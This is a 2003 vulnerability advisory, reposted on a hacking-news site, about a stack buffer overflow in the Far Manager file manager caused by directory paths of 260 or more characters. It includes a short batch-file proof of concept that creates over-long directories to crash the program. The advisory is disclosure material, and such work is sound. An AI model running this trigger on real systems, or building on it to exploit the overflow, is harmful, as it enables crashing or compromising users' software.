Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Far buffer overflow

Far buffer overflow

by Nikola Strahija on February 11th, 2003 FAR is most convinient console file manager developed by Eugene Roshal.


Title: Buffer overflow in Far Manager
Affected: Far Manager 1.70beta1 and prior
(saved EIP overflow)
1.70beta4
(off-by-one frame pointer overflow)
Vendor: RARSoft
Risk: Average (local code execution)
Exploitable: Yes
Remote: No
Vendor Notified: January, 30 2003

I. Introduction:

FAR is most convinient console file manager developed by Eugene Roshal

II. Vulnerability.

Stack based overflow occurs on paths >= 260 characters.

III. Details.

NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \? prefix may be used to
filename. This is documented feature of Windows API. Paths longer than
260 characters will cause FAR to crash. Far 1.70beta4 implements the
check of path length and does not allows to use paths longer than 160
characters. But due to bug in coding it's still possible to exploit FAR
by using path of exactly 260 characters (off-by-one stack pointer
overflow).

IV. Exploit

This .bat file demonstrates vulnerability (it creates directory with 2
subdirectories, first one will cause Far 1.70beta1 to crash, second one
will cause Far 1.70beta4 to crash.

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \?c:%A%
mkdir \?c:%A%%A%
mkdir \?c:%A%%B%

V. Vendor

Will be patched in 1.70beta5 than released.

--
http://www.security.nnov.ru


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »